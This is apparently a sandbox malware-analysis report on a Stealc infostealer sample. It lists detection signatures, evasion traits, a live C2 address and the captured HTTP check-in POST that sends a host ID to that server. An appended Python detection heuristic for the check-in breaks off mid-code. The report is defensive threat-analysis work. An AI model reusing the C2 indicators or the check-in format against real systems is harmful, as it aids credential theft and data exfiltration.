Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561557
MD5: 2ddf913f1bfac8e658b52ccbd75e8c80
SHA1: f1d0732f7ba49cd0dfee3ea084020e5b75c7ed22
SHA256: 8de92a481031783cdc05d07776627e2294dcb823399b3887e60ce461ff1ecad7
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2DDF913F1BFAC8E658B52CCBD75E8C80)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer, Plymouth, on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth, Stealc is a non-resident stealer with flexible data-collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency-wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6640 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6640 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
(No strings are listed for any of the matches.)
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T19:01:04.913259+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/uP | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/P | Avira URL Cloud: Label: malware
Source: file.exe.6640.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_00F64C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F660D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_00F660D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F840B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00F840B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F76960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_00F76960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat | 0_2_00F6EA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F69B80 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00F69B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F76B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_00F76B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F69B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00F69B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F67750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00F67750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F718A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F73910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F71269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F71250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F7E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F7CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F723A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 0_2_00F72390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F6DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F6DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F74B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F74B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F7D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 0_2_00F7DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F616B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F616A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 38 32 43 31 33 37 44 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
    Data Ascii (the 211 bytes above, CRLF-delimited; two multipart fields, hwid and build):
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="hwid"

    1882C137DD0C3886582548
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="build"

    mars
    ------IIEHJKJJJECFHJJJKKEC--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/:
Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/P
Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/uP
Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F69770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop | 0_2_00F69770
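The check-in POST captured above (a multipart body whose two fields are hwid and build, no User-Agent header, a raw IP in Host) is the exchange the Suricata alert fired on, and the Malpedia description notes that Stealc exfiltrates over HTTP POST. What follows is an added example, not code from the report, from Joe Sandbox or from the Stealc authors: a small parser that pulls the multipart fields out of the captured request and scores the traits a detection engineer would write a rule against. The request bytes are reconstructed from the report's request line, headers and "Data Raw" body, with the CRLF framing that the flattened view dropped assumed; the benign comparison request, its host name and tool string are constructed. The indicator set is my own reading of the capture, not the content of ET rule 2044243.

```python
import re

# Reconstructed from the captured check-in above: request line and header order as
# listed in the report, CRLF framing assumed, body = the 211-byte "Data Raw" dump.
CAPTURED_REQUEST = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------IIEHJKJJJECFHJJJKKEC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"1882C137DD0C3886582548\r\n"
    b"------IIEHJKJJJECFHJJJKKEC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"mars\r\n"
    b"------IIEHJKJJJECFHJJJKKEC--\r\n"
)

# Constructed benign upload for comparison (hypothetical host and tool string).
_BENIGN_BODY = (
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
    b"\r\n"
    b"hello\r\n"
    b"--abc123--\r\n"
)
BENIGN_REQUEST = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"User-Agent: curl/8.0\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n"
    b"Content-Length: " + str(len(_BENIGN_BODY)).encode() + b"\r\n\r\n" + _BENIGN_BODY
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value} for a multipart/form-data body, in wire order."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("multipart body without a boundary parameter")
    delimiter = b"--" + m.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if part_body.endswith(b"\r\n"):     # that CRLF belongs to the next delimiter
            part_body = part_body[:-2]
        name = re.search(rb';\s*name="([^"]*)"', part_head)   # skips filename="..."
        if name:
            fields[name.group(1).decode("latin-1")] = part_body.decode("latin-1")
    return fields


def looks_like_stealc_checkin(raw: bytes):
    """Heuristic verdict plus evidence. The indicators are the traits visible in the
    captured check-in; the verdict needs the three structural ones together."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    if method != "POST" or not path.endswith(".php") or not ctype.startswith("multipart/form-data"):
        return False, {"fields": {}, "indicators": {}}
    fields = parse_multipart(body, ctype)
    indicators = {
        "no_user_agent": "user-agent" not in headers,
        "hwid_build_first": list(fields)[:2] == ["hwid", "build"],
        "hwid_upper_hex": bool(re.fullmatch(r"[0-9A-F]{16,}", fields.get("hwid", ""))),
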